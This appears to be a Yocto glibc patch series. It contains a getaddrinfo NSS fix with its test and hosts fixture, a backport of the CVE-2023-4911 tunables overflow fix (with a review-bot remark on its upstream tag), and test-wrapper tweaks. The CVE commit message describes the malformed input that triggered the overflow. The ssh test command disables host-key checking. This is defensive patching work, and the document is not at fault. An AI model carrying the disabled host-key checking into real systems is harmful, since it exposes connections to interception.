57+++ b/nss/tst-nss-gai-actions.c
58@@ -0,0 +1,149 @@
59+/* Test continue and merge NSS actions for getaddrinfo.
60+ Copyright The GNU Toolchain Authors.
61+ This file is part of the GNU C Library.
62+
63+ The GNU C Library is free software; you can redistribute it and/or
64+ modify it under the terms of the GNU Lesser General Public
65+ License as published by the Free Software Foundation; either
66+ version 2.1 of the License, or (at your option) any later version.
67+
68+ The GNU C Library is distributed in the hope that it will be useful,
69+ but WITHOUT ANY WARRANTY; without even the implied warranty of
70+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
71+ Lesser General Public License for more details.
72+
73+ You should have received a copy of the GNU Lesser General Public
74+ License along with the GNU C Library; if not, see
75+ <https://www.gnu.org/licenses/>. */
76+
77+#include <dlfcn.h>
78+#include <gnu/lib-names.h>
79+#include <nss.h>
80+#include <stdio.h>
81+#include <stdlib.h>
82+#include <string.h>
83+
84+#include <support/check.h>
85+#include <support/format_nss.h>
86+#include <support/support.h>
87+#include <support/xstdio.h>
88+#include <support/xunistd.h>
89+
90+enum
91+{
92+ ACTION_MERGE = 0,
93+ ACTION_CONTINUE,
94+};
95+
96+static const char *
97+family_str (int family)
98+{
99+ switch (family)
100+ {
101+ case AF_UNSPEC:
102+ return "AF_UNSPEC";
103+ case AF_INET:
104+ return "AF_INET";
105+ default:
106+ __builtin_unreachable ();
107+ }
108+}
109+
110+static const char *
111+action_str (int action)
112+{
113+ switch (action)
114+ {
115+ case ACTION_MERGE:
116+ return "merge";
117+ case ACTION_CONTINUE:
118+ return "continue";
119+ default:
120+ __builtin_unreachable ();
121+ }
122+}
123+
124+static void
125+do_one_test (int action, int family, bool canon)
126+{
127+ struct addrinfo hints =
128+ {
129+ .ai_family = family,
130+ };
131+
132+ struct addrinfo *ai;
133+
134+ if (canon)
135+ hints.ai_flags = AI_CANONNAME;
136+
137+ printf ("***** Testing \"files [SUCCESS=%s] files\" for family %s, %s\n",
138+ action_str (action), family_str (family),
139+ canon ? "AI_CANONNAME" : "");
140+
141+ int ret = getaddrinfo ("example.org", "80", &hints, &ai);
142+
143+ switch (action)
144+ {
145+ case ACTION_MERGE:
146+ if (ret == 0)
147+ {
148+ char *formatted = support_format_addrinfo (ai, ret);
149+
150+ printf ("merge unexpectedly succeeded:\n %s\n", formatted);
151+ support_record_failure ();
152+ free (formatted);
153+ }
154+ else
155+ return;
156+ case ACTION_CONTINUE:
157+ {
158+ char *formatted = support_format_addrinfo (ai, ret);
159+
160+ /* Verify that the result appears exactly once. */
161+ const char *expected = "address: STREAM/TCP 192.0.0.1 80\n"
162+ "address: DGRAM/UDP 192.0.0.1 80\n"
163+ "address: RAW/IP 192.0.0.1 80\n";
164+
165+ const char *contains = strstr (formatted, expected);
166+ const char *contains2 = NULL;
167+
168+ if (contains != NULL)
169+ contains2 = strstr (contains + strlen (expected), expected);
170+
171+ if (contains == NULL || contains2 != NULL)
172+ {
173+ printf ("continue failed:\n%s\n", formatted);
174+ support_record_failure ();
175+ }
176+
177+ free (formatted);
178+ break;
179+ }
180+ default:
181+ __builtin_unreachable ();
182+ }
183+}
184+
185+static void
186+do_one_test_set (int action)
187+{
188+ char buf[32];
189+
190+ snprintf (buf, sizeof (buf), "files [SUCCESS=%s] files",
191+ action_str (action));
192+ __nss_configure_lookup ("hosts", buf);
193+
194+ do_one_test (action, AF_UNSPEC, false);
195+ do_one_test (action, AF_INET, false);
196+ do_one_test (action, AF_INET, true);
197+}
198+
199+static int
200+do_test (void)
201+{
202+ do_one_test_set (ACTION_CONTINUE);
203+ do_one_test_set (ACTION_MERGE);
204+ return 0;
205+}
206+
207+#include <support/test-driver.c>
208diff --git a/nss/tst-nss-gai-actions.root/etc/host.conf b/nss/tst-nss-gai-actions.root/etc/host.conf
209new file mode 100644
210index 0000000000..d1a59f73a9
211--- /dev/null
212+++ b/nss/tst-nss-gai-actions.root/etc/host.conf
213@@ -0,0 +1 @@
214+multi on
215diff --git a/nss/tst-nss-gai-actions.root/etc/hosts b/nss/tst-nss-gai-actions.root/etc/hosts
216new file mode 100644
217index 0000000000..50ce9774dc
218--- /dev/null
219+++ b/nss/tst-nss-gai-actions.root/etc/hosts
220@@ -0,0 +1,508 @@
221+192.0.0.1 example.org
222+192.0.0.2 example.org
223+192.0.0.3 example.org
224+192.0.0.4 example.org
225+192.0.0.5 example.org
226+192.0.0.6 example.org
227+192.0.0.7 example.org
228+192.0.0.8 example.org
229+192.0.0.9 example.org
230+192.0.0.10 example.org
231+192.0.0.11 example.org
232+192.0.0.12 example.org
233+192.0.0.13 example.org
234+192.0.0.14 example.org
235+192.0.0.15 example.org
236+192.0.0.16 example.org
237+192.0.0.17 example.org
238+192.0.0.18 example.org
239+192.0.0.19 example.org
240+192.0.0.20 example.org
241+192.0.0.21 example.org
242+192.0.0.22 example.org
243+192.0.0.23 example.org
244+192.0.0.24 example.org
245+192.0.0.25 example.org
246+192.0.0.26 example.org
247+192.0.0.27 example.org
248+192.0.0.28 example.org
249+192.0.0.29 example.org
250+192.0.0.30 example.org
251+192.0.0.31 example.org
252+192.0.0.32 example.org
253+192.0.0.33 example.org
254+192.0.0.34 example.org
255+192.0.0.35 example.org
256+192.0.0.36 example.org
257+192.0.0.37 example.org
258+192.0.0.38 example.org
259+192.0.0.39 example.org
260+192.0.0.40 example.org
261+192.0.0.41 example.org
262+192.0.0.42 example.org
263+192.0.0.43 example.org
264+192.0.0.44 example.org
265+192.0.0.45 example.org
266+192.0.0.46 example.org
267+192.0.0.47 example.org
268+192.0.0.48 example.org
269+192.0.0.49 example.org
270+192.0.0.50 example.org
271+192.0.0.51 example.org
272+192.0.0.52 example.org
273+192.0.0.53 example.org
274+192.0.0.54 example.org
275+192.0.0.55 example.org
276+192.0.0.56 example.org
277+192.0.0.57 example.org
278+192.0.0.58 example.org
279+192.0.0.59 example.org
280+192.0.0.60 example.org
281+192.0.0.61 example.org
282+192.0.0.62 example.org
283+192.0.0.63 example.org
284+192.0.0.64 example.org
285+192.0.0.65 example.org
286+192.0.0.66 example.org
287+192.0.0.67 example.org
288+192.0.0.68 example.org
289+192.0.0.69 example.org
290+192.0.0.70 example.org
291+192.0.0.71 example.org
292+192.0.0.72 example.org
293+192.0.0.73 example.org
294+192.0.0.74 example.org
295+192.0.0.75 example.org
296+192.0.0.76 example.org
297+192.0.0.77 example.org
298+192.0.0.78 example.org
299+192.0.0.79 example.org
300+192.0.0.80 example.org
301+192.0.0.81 example.org
302+192.0.0.82 example.org
303+192.0.0.83 example.org
304+192.0.0.84 example.org
305+192.0.0.85 example.org
306+192.0.0.86 example.org
307+192.0.0.87 example.org
308+192.0.0.88 example.org
309+192.0.0.89 example.org
310+192.0.0.90 example.org
311+192.0.0.91 example.org
312+192.0.0.92 example.org
313+192.0.0.93 example.org
314+192.0.0.94 example.org
315+192.0.0.95 example.org
316+192.0.0.96 example.org
317+192.0.0.97 example.org
318+192.0.0.98 example.org
319+192.0.0.99 example.org
320+192.0.0.100 example.org
321+192.0.0.101 example.org
322+192.0.0.102 example.org
323+192.0.0.103 example.org
324+192.0.0.104 example.org
325+192.0.0.105 example.org
326+192.0.0.106 example.org
327+192.0.0.107 example.org
328+192.0.0.108 example.org
329+192.0.0.109 example.org
330+192.0.0.110 example.org
331+192.0.0.111 example.org
332+192.0.0.112 example.org
333+192.0.0.113 example.org
334+192.0.0.114 example.org
335+192.0.0.115 example.org
336+192.0.0.116 example.org
337+192.0.0.117 example.org
338+192.0.0.118 example.org
339+192.0.0.119 example.org
340+192.0.0.120 example.org
341+192.0.0.121 example.org
342+192.0.0.122 example.org
343+192.0.0.123 example.org
344+192.0.0.124 example.org
345+192.0.0.125 example.org
346+192.0.0.126 example.org
347+192.0.0.127 example.org
348+192.0.0.128 example.org
349+192.0.0.129 example.org
350+192.0.0.130 example.org
351+192.0.0.131 example.org
352+192.0.0.132 example.org
353+192.0.0.133 example.org
354+192.0.0.134 example.org
355+192.0.0.135 example.org
356+192.0.0.136 example.org
357+192.0.0.137 example.org
358+192.0.0.138 example.org
359+192.0.0.139 example.org
360+192.0.0.140 example.org
361+192.0.0.141 example.org
362+192.0.0.142 example.org
363+192.0.0.143 example.org
364+192.0.0.144 example.org
365+192.0.0.145 example.org
366+192.0.0.146 example.org
367+192.0.0.147 example.org
368+192.0.0.148 example.org
369+192.0.0.149 example.org
370+192.0.0.150 example.org
371+192.0.0.151 example.org
372+192.0.0.152 example.org
373+192.0.0.153 example.org
374+192.0.0.154 example.org
375+192.0.0.155 example.org
376+192.0.0.156 example.org
377+192.0.0.157 example.org
378+192.0.0.158 example.org
379+192.0.0.159 example.org
380+192.0.0.160 example.org
381+192.0.0.161 example.org
382+192.0.0.162 example.org
383+192.0.0.163 example.org
384+192.0.0.164 example.org
385+192.0.0.165 example.org
386+192.0.0.166 example.org
387+192.0.0.167 example.org
388+192.0.0.168 example.org
389+192.0.0.169 example.org
390+192.0.0.170 example.org
391+192.0.0.171 example.org
392+192.0.0.172 example.org
393+192.0.0.173 example.org
394+192.0.0.174 example.org
395+192.0.0.175 example.org
396+192.0.0.176 example.org
397+192.0.0.177 example.org
398+192.0.0.178 example.org
399+192.0.0.179 example.org
400+192.0.0.180 example.org
401+192.0.0.181 example.org
402+192.0.0.182 example.org
403+192.0.0.183 example.org
404+192.0.0.184 example.org
405+192.0.0.185 example.org
406+192.0.0.186 example.org
407+192.0.0.187 example.org
408+192.0.0.188 example.org
409+192.0.0.189 example.org
410+192.0.0.190 example.org
411+192.0.0.191 example.org
412+192.0.0.192 example.org
413+192.0.0.193 example.org
414+192.0.0.194 example.org
415+192.0.0.195 example.org
416+192.0.0.196 example.org
417+192.0.0.197 example.org
418+192.0.0.198 example.org
419+192.0.0.199 example.org
420+192.0.0.200 example.org
421+192.0.0.201 example.org
422+192.0.0.202 example.org
423+192.0.0.203 example.org
424+192.0.0.204 example.org
425+192.0.0.205 example.org
426+192.0.0.206 example.org
427+192.0.0.207 example.org
428+192.0.0.208 example.org
429+192.0.0.209 example.org
430+192.0.0.210 example.org
431+192.0.0.211 example.org
432+192.0.0.212 example.org
433+192.0.0.213 example.org
434+192.0.0.214 example.org
435+192.0.0.215 example.org
436+192.0.0.216 example.org
437+192.0.0.217 example.org
438+192.0.0.218 example.org
439+192.0.0.219 example.org
440+192.0.0.220 example.org
441+192.0.0.221 example.org
442+192.0.0.222 example.org
443+192.0.0.223 example.org
444+192.0.0.224 example.org
445+192.0.0.225 example.org
446+192.0.0.226 example.org
447+192.0.0.227 example.org
448+192.0.0.228 example.org
449+192.0.0.229 example.org
450+192.0.0.230 example.org
451+192.0.0.231 example.org
452+192.0.0.232 example.org
453+192.0.0.233 example.org
454+192.0.0.234 example.org
455+192.0.0.235 example.org
456+192.0.0.236 example.org
457+192.0.0.237 example.org
458+192.0.0.238 example.org
459+192.0.0.239 example.org
460+192.0.0.240 example.org
461+192.0.0.241 example.org
462+192.0.0.242 example.org
463+192.0.0.243 example.org
464+192.0.0.244 example.org
465+192.0.0.245 example.org
466+192.0.0.246 example.org
467+192.0.0.247 example.org
468+192.0.0.248 example.org
469+192.0.0.249 example.org
470+192.0.0.250 example.org
471+192.0.0.251 example.org
472+192.0.0.252 example.org
473+192.0.0.253 example.org
474+192.0.0.254 example.org
475+192.0.1.1 example.org
476+192.0.1.2 example.org
477+192.0.1.3 example.org
478+192.0.1.4 example.org
479+192.0.1.5 example.org
480+192.0.1.6 example.org
481+192.0.1.7 example.org
482+192.0.1.8 example.org
483+192.0.1.9 example.org
484+192.0.1.10 example.org
485+192.0.1.11 example.org
486+192.0.1.12 example.org
487+192.0.1.13 example.org
488+192.0.1.14 example.org
489+192.0.1.15 example.org
490+192.0.1.16 example.org
491+192.0.1.17 example.org
492+192.0.1.18 example.org
493+192.0.1.19 example.org
494+192.0.1.20 example.org
495+192.0.1.21 example.org
496+192.0.1.22 example.org
497+192.0.1.23 example.org
498+192.0.1.24 example.org
499+192.0.1.25 example.org
500+192.0.1.26 example.org
501+192.0.1.27 example.org
502+192.0.1.28 example.org
503+192.0.1.29 example.org
504+192.0.1.30 example.org
505+192.0.1.31 example.org
506+192.0.1.32 example.org
507+192.0.1.33 example.org
508+192.0.1.34 example.org
509+192.0.1.35 example.org
510+192.0.1.36 example.org
511+192.0.1.37 example.org
512+192.0.1.38 example.org
513+192.0.1.39 example.org
514+192.0.1.40 example.org
515+192.0.1.41 example.org
516+192.0.1.42 example.org
517+192.0.1.43 example.org
518+192.0.1.44 example.org
519+192.0.1.45 example.org
520+192.0.1.46 example.org
521+192.0.1.47 example.org
522+192.0.1.48 example.org
523+192.0.1.49 example.org
524+192.0.1.50 example.org
525+192.0.1.51 example.org
526+192.0.1.52 example.org
527+192.0.1.53 example.org
528+192.0.1.54 example.org
529+192.0.1.55 example.org
530+192.0.1.56 example.org
531+192.0.1.57 example.org
532+192.0.1.58 example.org
533+192.0.1.59 example.org
534+192.0.1.60 example.org
535+192.0.1.61 example.org
536+192.0.1.62 example.org
537+192.0.1.63 example.org
538+192.0.1.64 example.org
539+192.0.1.65 example.org
540+192.0.1.66 example.org
541+192.0.1.67 example.org
542+192.0.1.68 example.org
543+192.0.1.69 example.org
544+192.0.1.70 example.org
545+192.0.1.71 example.org
546+192.0.1.72 example.org
547+192.0.1.73 example.org
548+192.0.1.74 example.org
549+192.0.1.75 example.org
550+192.0.1.76 example.org
551+192.0.1.77 example.org
552+192.0.1.78 example.org
553+192.0.1.79 example.org
554+192.0.1.80 example.org
555+192.0.1.81 example.org
556+192.0.1.82 example.org
557+192.0.1.83 example.org
558+192.0.1.84 example.org
559+192.0.1.85 example.org
560+192.0.1.86 example.org
561+192.0.1.87 example.org
562+192.0.1.88 example.org
563+192.0.1.89 example.org
564+192.0.1.90 example.org
565+192.0.1.91 example.org
566+192.0.1.92 example.org
567+192.0.1.93 example.org
568+192.0.1.94 example.org
569+192.0.1.95 example.org
570+192.0.1.96 example.org
571+192.0.1.97 example.org
572+192.0.1.98 example.org
573+192.0.1.99 example.org
574+192.0.1.100 example.org
575+192.0.1.101 example.org
576+192.0.1.102 example.org
577+192.0.1.103 example.org
578+192.0.1.104 example.org
579+192.0.1.105 example.org
580+192.0.1.106 example.org
581+192.0.1.107 example.org
582+192.0.1.108 example.org
583+192.0.1.109 example.org
584+192.0.1.110 example.org
585+192.0.1.111 example.org
586+192.0.1.112 example.org
587+192.0.1.113 example.org
588+192.0.1.114 example.org
589+192.0.1.115 example.org
590+192.0.1.116 example.org
591+192.0.1.117 example.org
592+192.0.1.118 example.org
593+192.0.1.119 example.org
594+192.0.1.120 example.org
595+192.0.1.121 example.org
596+192.0.1.122 example.org
597+192.0.1.123 example.org
598+192.0.1.124 example.org
599+192.0.1.125 example.org
600+192.0.1.126 example.org
601+192.0.1.127 example.org
602+192.0.1.128 example.org
603+192.0.1.129 example.org
604+192.0.1.130 example.org
605+192.0.1.131 example.org
606+192.0.1.132 example.org
607+192.0.1.133 example.org
608+192.0.1.134 example.org
609+192.0.1.135 example.org
610+192.0.1.136 example.org
611+192.0.1.137 example.org
612+192.0.1.138 example.org
613+192.0.1.139 example.org
614+192.0.1.140 example.org
615+192.0.1.141 example.org
616+192.0.1.142 example.org
617+192.0.1.143 example.org
618+192.0.1.144 example.org
619+192.0.1.145 example.org
620+192.0.1.146 example.org
621+192.0.1.147 example.org
622+192.0.1.148 example.org
623+192.0.1.149 example.org
624+192.0.1.150 example.org
625+192.0.1.151 example.org
626+192.0.1.152 example.org
627+192.0.1.153 example.org
628+192.0.1.154 example.org
629+192.0.1.155 example.org
630+192.0.1.156 example.org
631+192.0.1.157 example.org
632+192.0.1.158 example.org
633+192.0.1.159 example.org
634+192.0.1.160 example.org
635+192.0.1.161 example.org
636+192.0.1.162 example.org
637+192.0.1.163 example.org
638+192.0.1.164 example.org
639+192.0.1.165 example.org
640+192.0.1.166 example.org
641+192.0.1.167 example.org
642+192.0.1.168 example.org
643+192.0.1.169 example.org
644+192.0.1.170 example.org
645+192.0.1.171 example.org
646+192.0.1.172 example.org
647+192.0.1.173 example.org
648+192.0.1.174 example.org
649+192.0.1.175 example.org
650+192.0.1.176 example.org
651+192.0.1.177 example.org
652+192.0.1.178 example.org
653+192.0.1.179 example.org
654+192.0.1.180 example.org
655+192.0.1.181 example.org
656+192.0.1.182 example.org
657+192.0.1.183 example.org
658+192.0.1.184 example.org
659+192.0.1.185 example.org
660+192.0.1.186 example.org
661+192.0.1.187 example.org
662+192.0.1.188 example.org
663+192.0.1.189 example.org
664+192.0.1.190 example.org
665+192.0.1.191 example.org
666+192.0.1.192 example.org
667+192.0.1.193 example.org
668+192.0.1.194 example.org
669+192.0.1.195 example.org
670+192.0.1.196 example.org
671+192.0.1.197 example.org
672+192.0.1.198 example.org
673+192.0.1.199 example.org
674+192.0.1.200 example.org
675+192.0.1.201 example.org
676+192.0.1.202 example.org
677+192.0.1.203 example.org
678+192.0.1.204 example.org
679+192.0.1.205 example.org
680+192.0.1.206 example.org
681+192.0.1.207 example.org
682+192.0.1.208 example.org
683+192.0.1.209 example.org
684+192.0.1.210 example.org
685+192.0.1.211 example.org
686+192.0.1.212 example.org
687+192.0.1.213 example.org
688+192.0.1.214 example.org
689+192.0.1.215 example.org
690+192.0.1.216 example.org
691+192.0.1.217 example.org
692+192.0.1.218 example.org
693+192.0.1.219 example.org
694+192.0.1.220 example.org
695+192.0.1.221 example.org
696+192.0.1.222 example.org
697+192.0.1.223 example.org
698+192.0.1.224 example.org
699+192.0.1.225 example.org
700+192.0.1.226 example.org
701+192.0.1.227 example.org
702+192.0.1.228 example.org
703+192.0.1.229 example.org
704+192.0.1.230 example.org
705+192.0.1.231 example.org
706+192.0.1.232 example.org
707+192.0.1.233 example.org
708+192.0.1.234 example.org
709+192.0.1.235 example.org
710+192.0.1.236 example.org
711+192.0.1.237 example.org
712+192.0.1.238 example.org
713+192.0.1.239 example.org
714+192.0.1.240 example.org
715+192.0.1.241 example.org
716+192.0.1.242 example.org
717+192.0.1.243 example.org
718+192.0.1.244 example.org
719+192.0.1.245 example.org
720+192.0.1.246 example.org
721+192.0.1.247 example.org
722+192.0.1.248 example.org
723+192.0.1.249 example.org
724+192.0.1.250 example.org
725+192.0.1.251 example.org
726+192.0.1.252 example.org
727+192.0.1.253 example.org
728+192.0.1.254 example.org
729diff --git a/sysdeps/posix/getaddrinfo.c b/sysdeps/posix/getaddrinfo.c
730index 18dccd5924..3d9bea60c6 100644
731--- a/sysdeps/posix/getaddrinfo.c
732+++ b/sysdeps/posix/getaddrinfo.c
733@@ -458,11 +458,6 @@ gaih_inet (const char *name, const struct gaih_service *service,
734
735 if (name != NULL)
736 {
737- at = alloca_account (sizeof (struct gaih_addrtuple), alloca_used);
738- at->family = AF_UNSPEC;
739- at->scopeid = 0;
740- at->next = NULL;
741-
742 if (req->ai_flags & AI_IDN)
743 {
744 char *out;
745@@ -473,13 +468,21 @@ gaih_inet (const char *name, const struct gaih_service *service,
746 malloc_name = true;
747 }
748
749- if (__inet_aton_exact (name, (struct in_addr *) at->addr) != 0)
750+ uint32_t addr[4];
751+ if (__inet_aton_exact (name, (struct in_addr *) addr) != 0)
752 {
753+ at = alloca_account (sizeof (struct gaih_addrtuple), alloca_used);
754+ at->scopeid = 0;
755+ at->next = NULL;
756+
757 if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET)
758- at->family = AF_INET;
759+ {
760+ memcpy (at->addr, addr, sizeof (at->addr));
761+ at->family = AF_INET;
762+ }
763 else if (req->ai_family == AF_INET6 && (req->ai_flags & AI_V4MAPPED))
764 {
765- at->addr[3] = at->addr[0];
766+ at->addr[3] = addr[0];
767 at->addr[2] = htonl (0xffff);
768 at->addr[1] = 0;
769 at->addr[0] = 0;
770@@ -505,49 +505,62 @@
771
772 if (req->ai_flags & AI_CANONNAME)
773 canon = name;
774+
775+ goto process_list;
776 }
777- else if (at->family == AF_UNSPEC)
778+
779+ char *scope_delim = strchr (name, SCOPE_DELIMITER);
780+ int e;
781+
782+ if (scope_delim == NULL)
783+ e = inet_pton (AF_INET6, name, addr);
784+ else
785+ e = __inet_pton_length (AF_INET6, name, scope_delim - name, addr);
786+
787+ if (e > 0)
788 {
789- char *scope_delim = strchr (name, SCOPE_DELIMITER);
790- int e;
791- if (scope_delim == NULL)
792- e = inet_pton (AF_INET6, name, at->addr);
793+ at = alloca_account (sizeof (struct gaih_addrtuple),
794+ alloca_used);
795+ at->scopeid = 0;
796+ at->next = NULL;
797+
798+ if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET6)
799+ {
800+ memcpy (at->addr, addr, sizeof (at->addr));
801+ at->family = AF_INET6;
802+ }
803+ else if (req->ai_family == AF_INET
804+ && IN6_IS_ADDR_V4MAPPED (addr))
805+ {
806+ at->addr[0] = addr[3];
807+ at->addr[1] = addr[1];
808+ at->addr[2] = addr[2];
809+ at->addr[3] = addr[3];
810+ at->family = AF_INET;
811+ }
812 else
813- e = __inet_pton_length (AF_INET6, name, scope_delim - name,
814- at->addr);
815- if (e > 0)
816 {
817- if (req->ai_family == AF_UNSPEC || req->ai_family == AF_INET6)
818- at->family = AF_INET6;
819- else if (req->ai_family == AF_INET
820- && IN6_IS_ADDR_V4MAPPED (at->addr))
821- {
822- at->addr[0] = at->addr[3];
823- at->family = AF_INET;
824- }
825- else
826- {
827- result = -EAI_ADDRFAMILY;
828- goto free_and_return;
829- }
830-
831- if (scope_delim != NULL
832- && __inet6_scopeid_pton ((struct in6_addr *) at->addr,
833- scope_delim + 1,
834- &at->scopeid) != 0)
835- {
836- result = -EAI_NONAME;
837- goto free_and_return;
838- }
839+ result = -EAI_ADDRFAMILY;
840+ goto free_and_return;
841+ }
842
843- if (req->ai_flags & AI_CANONNAME)
844- canon = name;
845+ if (scope_delim != NULL
846+ && __inet6_scopeid_pton ((struct in6_addr *) at->addr,
847+ scope_delim + 1,
848+ &at->scopeid) != 0)
849+ {
850+ result = -EAI_NONAME;
851+ goto free_and_return;
852 }
853+
854+ if (req->ai_flags & AI_CANONNAME)
855+ canon = name;
856+
857+ goto process_list;
858 }
859
860- if (at->family == AF_UNSPEC && (req->ai_flags & AI_NUMERICHOST) == 0)
861+ if ((req->ai_flags & AI_NUMERICHOST) == 0)
862 {
863- struct gaih_addrtuple **pat = &at;
864 int no_data = 0;
865 int no_inet6_data = 0;
866 service_user *nip;
867@@ -543,6 +559,7 @@ gaih_inet (const char *name, const struct gaih_service *service,
868 enum nss_status status = NSS_STATUS_UNAVAIL;
869 int no_more;
870 struct resolv_context *res_ctx = NULL;
871+ bool do_merge = false;
872
873 /* If we do not have to look for IPv6 addresses or the canonical
874 name, use the simple, old functions, which do not support
875@@ -579,7 +596,7 @@ gaih_inet (const char *name, const struct gaih_service *service,
876 result = -EAI_MEMORY;
877 goto free_and_return;
878 }
879- *pat = addrmem;
880+ at = addrmem;
881 }
882 else
883 {
884@@ -632,6 +649,8 @@ gaih_inet (const char *name, const struct gaih_service *service,
885 }
886
887 struct gaih_addrtuple *addrfree = addrmem;
888+ struct gaih_addrtuple **pat = &at;
889+
890 for (int i = 0; i < air->naddrs; ++i)
891 {
892 socklen_t size = (air->family[i] == AF_INET
893@@ -695,12 +714,6 @@ gaih_inet (const char *name, const struct gaih_service *service,
894
895 free (air);
896
897- if (at->family == AF_UNSPEC)
898- {
899- result = -EAI_NONAME;
900- goto free_and_return;
901- }
902-
903 goto process_list;
904 }
905 else if (err == 0)
906@@ -750,6 +763,22 @@
907
908 while (!no_more)
909 {
910+ /* Always start afresh; continue should discard previous results
911+ and the hosts database does not support merge. */
912+ at = NULL;
913+ free (canonbuf);
914+ free (addrmem);
915+ canon = canonbuf = NULL;
916+ addrmem = NULL;
917+ got_ipv6 = false;
918+
919+ if (do_merge)
920+ {
921+ __set_h_errno (NETDB_INTERNAL);
922+ __set_errno (EBUSY);
923+ break;
924+ }
925+
926 no_data = 0;
927 nss_gethostbyname4_r fct4 = NULL;
928
929@@ -744,12 +773,14 @@ gaih_inet (const char *name, const struct gaih_service *service,
930 {
931 while (1)
932 {
933- status = DL_CALL_FCT (fct4, (name, pat,
934+ status = DL_CALL_FCT (fct4, (name, &at,
935 tmpbuf->data, tmpbuf->length,
936 &errno, &h_errno,
937 NULL));
938 if (status == NSS_STATUS_SUCCESS)
939 break;
940+ /* gethostbyname4_r may write into AT, so reset it. */
941+ at = NULL;
942 if (status != NSS_STATUS_TRYAGAIN
943 || errno != ERANGE || h_errno != NETDB_INTERNAL)
944 {
945@@ -774,7 +805,9 @@ gaih_inet (const char *name, const struct gaih_service *service,
946 no_data = 1;
947
948 if ((req->ai_flags & AI_CANONNAME) != 0 && canon == NULL)
949- canon = (*pat)->name;
950+ canon = at->name;
951+
952+ struct gaih_addrtuple **pat = &at;
953
954 while (*pat != NULL)
955 {
956@@ -826,6 +859,8 @@ gaih_inet (const char *name, const struct gaih_service *service,
957
958 if (fct != NULL)
959 {
960+ struct gaih_addrtuple **pat = &at;
961+
962 if (req->ai_family == AF_INET6
963 || req->ai_family == AF_UNSPEC)
964 {
965@@ -917,6 +946,10 @@
966 if (nss_next_action (nip, status) == NSS_ACTION_RETURN)
967 break;
968
969+ /* The hosts database does not support MERGE. */
970+ if (nss_next_action (nip, status) == NSS_ACTION_MERGE)
971+ do_merge = true;
972+
973 if (nip->next == NULL)
974 no_more = -1;
975 else
976@@ -930,7 +969,7 @@ gaih_inet (const char *name, const struct gaih_service *service,
977 }
978
979 process_list:
980- if (at->family == AF_UNSPEC)
981+ if (at == NULL)
982 {
983 result = -EAI_NONAME;
984 goto free_and_return;
985--
9862.39.3
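diff --git a/meta/recipes-core/glibc/glibc/CVE-2023-4911.patch b/meta/recipes-core/glibc/glibc/CVE-2023-4911.patch
new file mode 100644
index 0000000000..4d3146509a
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2023-4911.patch
@@ -0,0 +1,63 @@
+From d2b77337f734fcacdfc8e0ddec14cf31a746c7be Mon Sep 17 00:00:00 2001
+From: Siddhesh Poyarekar <siddhesh@redhat.com>
+Date: Mon, 11 Sep 2023 18:53:15 -0400
+Subject: [PATCH v2] tunables: Terminate immediately if end of input is reached
+
+The string parsing routine may end up writing beyond bounds of tunestr
+if the input tunable string is malformed, of the form name=name=val.
+This gets processed twice, first as name=name=val and next as name=val,
+resulting in tunestr being name=name=val:name=val, thus overflowing
+tunestr.
+
+Terminate the parsing loop at the first instance itself so that tunestr
+does not overflow.
+---
+Changes from v1:
+
+- Also null-terminate tunestr before exiting.
+
+ elf/dl-tunables.c | 17 ++++++++++-------
+ 1 file changed, 10 insertions(+), 7 deletions(-)
+
+Upstream-Status: Backport [git://sourceware.org/git/glibc.git]
+CVE: CVE-2023-4911
+
+diff --git a/elf/dl-tunables.c b/elf/dl-tunables.c
+index 8e7ee9df10..76cf8b9da3 100644
+--- a/elf/dl-tunables.c
++++ b/elf/dl-tunables.c
+@@ -187,11 +187,7 @@ parse_tunables (char *tunestr, char *valstring)
+ /* If we reach the end of the string before getting a valid name-value
+ pair, bail out. */
+ if (p[len] == '\0')
+- {
+- if (__libc_enable_secure)
+- tunestr[off] = '\0';
+- return;
+- }
++ break;
+
+ /* We did not find a valid name-value pair before encountering the
+ colon. */
+@@ -251,9 +247,16 @@ parse_tunables (char *tunestr, char *valstring)
+ }
+ }
+
+- if (p[len] != '\0')
+- p += len + 1;
++ /* We reached the end while processing the tunable string. */
++ if (p[len] == '\0')
++ break;
++
++ p += len + 1;
+ }
++
++ /* Terminate tunestr before we leave. */
++ if (__libc_enable_secure)
++ tunestr[off] = '\0';
+ }
+ #endif
+
+--
+2.41.0
+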
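Review bot: The patch header reads `Upstream-Status: Backport [git://sourceware.org/git/glibc.git]` without naming the upstream commit, and the subject still says `[PATCH v2]`, which suggests the mailing-list posting rather than the merged change was imported. For a fix to an out-of-bounds write in tunables parsing, that leaves a reviewer unable to confirm that this text matches what glibc finally merged. I would name the merged commit in the tag, `Upstream-Status: Backport [<upstream commit URL>]`, and add the importer's `Signed-off-by:` line, which the header also lacks. The body of parse_tunables lies mostly outside the two inner hunks, so the remaining exit paths of the loop cannot be checked from here.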
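diff --git a/meta/recipes-core/glibc/glibc/check-test-wrapper b/meta/recipes-core/glibc/glibc/check-test-wrapper
index f8e04e02d2..5cc993f718 100644
--- a/meta/recipes-core/glibc/glibc/check-test-wrapper
+++ b/meta/recipes-core/glibc/glibc/check-test-wrapper
@@ -2,6 +2,7 @@
 import sys
 import os
 import subprocess
+import resource
 
 env = os.environ.copy()
 args = sys.argv[1:]
@@ -44,12 +45,20 @@ if targettype == "user":
  qemuargs += ["-L", sysroot]
  qemuargs += ["-E", "LD_LIBRARY_PATH={}".format(":".join(libpaths))]
  command = qemuargs + args
+
+ # We've seen qemu-arm using up all system memory for some glibc
+ # tests e.g. nptl/tst-pthread-timedlock-lockloop
+ # Cap at 8GB since no test should need more than that
+ # (5GB adds 7 failures for qemuarm glibc test run)
+ limit = 8*1024*1024*1024
+ resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
+
 elif targettype == "ssh":
  host = os.environ.get("SSH_HOST", None)
  user = os.environ.get("SSH_HOST_USER", None)
  port = os.environ.get("SSH_HOST_PORT", None)
 
- command = ["ssh", "-o", "UserKnownHostsFile=/dev/null", "-o", "StrictHostKeyChecking=no"]
+ command = ["ssh", "-o", "UserKnownHostsFile=/dev/null", "-o", "StrictHostKeyChecking=no", "-o", "LogLevel=quiet"]
  if port:
  command += ["-p", str(port)]
  if not host: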
